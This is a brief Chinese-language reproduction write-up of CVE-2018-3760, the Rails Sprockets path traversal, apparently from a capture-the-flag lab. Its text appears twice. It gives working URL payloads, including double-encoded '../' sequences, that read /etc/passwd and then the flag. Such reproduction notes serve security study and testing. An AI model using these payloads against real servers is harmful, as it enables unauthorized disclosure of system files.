CVE-2018-3760复现

打开网站

访问/assets/file:%2f%2f/etc/passwd

通过报错的提示,选择一个可以访问的路径
/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

访问flag

CVE-2018-3760复现

打开网站

访问/assets/file:%2f%2f/etc/passwd

通过报错的提示,选择一个可以访问的路径
/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

访问flag
